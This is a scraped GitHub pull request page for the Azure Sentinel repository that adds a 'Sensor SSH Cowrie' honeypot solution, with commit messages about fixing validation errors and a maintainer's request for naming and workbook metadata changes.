-
Notifications
You must be signed in to change notification settings - Fork 3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Sensor SSH Cowrie solution #11155
Open
swiftsolves-msft
wants to merge
33
commits into
Azure:master
Choose a base branch
from
swiftsolves-msft:cowrie-nates
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Sensor SSH Cowrie solution #11155
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
As part of Hackathon 2024 a team developed a 1 click deploy solution that will deploy a debain vm, install cowrie, create ama dcr, dce, and association, and create a custom table to collect cowrie events. Solution contains a workbook (under development), 1 parser and 5 detection rules . The goal is make this a framework for others and community to create other 1 click deploy for other types of interactive honeypots. Can be used publicly for TI or privately as a detection tripwire
fixing yaml spacing intial validation tests failed.
added workbook and fixing parser yaml
fixed some kql, data connector, workbook validation errors, still researching the permissions on data connector does not match.
made a change to fix kql validation removing commas after each extend and new line | extend, also removed txt based parser.
added vm ext ama for linux in deployment.
fixing detections validation error SourceIP custom colum name to sentinel recognized field Address
minor fixes to validation errors
minor fix filehash
added algo identifier
created new kql validator for cowrie
added | extend for beinging of query line 25
updated deploy to azure button links and data connector permissions reqs
changes to data connector to pass kql validations
sreedharande
previously approved these changes
Sep 26, 2024
create a custom sample data for Sensor SSH Cowrie solution.
Hi @swiftsolves-msft,
|
[like] Nathan Swift reacted to your message:
…________________________________
From: v-atulyadav ***@***.***>
Sent: Thursday, November 7, 2024 7:12:15 AM
To: Azure/Azure-Sentinel ***@***.***>
Cc: Nathan Swift ***@***.***>; Mention ***@***.***>
Subject: Re: [Azure/Azure-Sentinel] Sensor SSH Cowrie solution (PR #11155)
Hi @swiftsolves-msft<https://github.com/swiftsolves-msft>,
We require a few modifications to the PR before proceeding with packaging.
1. The Name property of the data file is currently set to Cowrie, whereas it should be designated as Sensor SSH Cowrie.
image.png (view on web)<https://github.com/user-attachments/assets/feb2fed6-c8f4-47b6-bacc-9527a7cef7b4>
1. It is also necessary to include workbook metadata in the workbookmetadata.json file
(https://github.com/Azure/Azure-Sentinel/blob/master/Workbooks/WorkbooksMetadata.json)
—
Reply to this email directly, view it on GitHub<#11155 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AHIYRC3ADYI2UEY37KJXE7TZ7MHE7AVCNFSM6AAAAABOQYQ4WKVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDINRRGQ4DANZZGA>.
You are receiving this because you were mentioned.Message ID: ***@***.***>
|
change solution name to match and added workbook metadata in
update images for preview for workbook
Hi @swiftsolves-msft, |
Hi @swiftsolves-msft, |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
As part of Hackathon 2024 a team developed a 1 click deploy solution that will deploy a debain vm, install cowrie, create ama dcr, dce, and association, and create a custom table to collect cowrie events. Solution contains a workbook (under development), 1 parser and 5 detection rules . The goal is make this a framework for others and community to create other 1 click deploy for other types of interactive honeypots. Can be used publicly for TI or privately as a detection tripwire
Required items, please complete
Change(s):
Reason for Change(s):
Version Updated:
Testing Completed:
Checked that the validations are passing and have addressed any issues that are present:
Guidance <- remove section before submitting
Before submitting this PR please ensure that you have read the following sections and filled out the changes, reason for change and testing complete sections:
Thank you for your contribution to the Microsoft Sentinel Github repo.
Change(s):
Reason for Change(s):
Version updated:
Testing Completed:
Note: If updating a detection, you must update the version field.
Checked that the validations are passing and have addressed any issues that are present:
Note: Let us know if you have tried fixing the validation error and need help.